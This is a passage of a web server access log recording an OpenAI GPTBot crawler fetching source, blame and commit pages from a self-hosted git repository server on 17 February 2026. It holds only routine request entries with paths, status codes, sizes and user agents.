+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11254] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14406] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" -[17/Feb/2026:16:20:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm" [Client 74.7.227.38] [Length 115942] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:16:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15180] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:20:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11027] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11058] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13389] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16658] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13360] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16627] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:16:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11655] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:16:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:16:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:16:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:16:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:16:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11663] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:16:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11219] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" -[17/Feb/2026:16:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11248] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12339] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10170] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10147] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 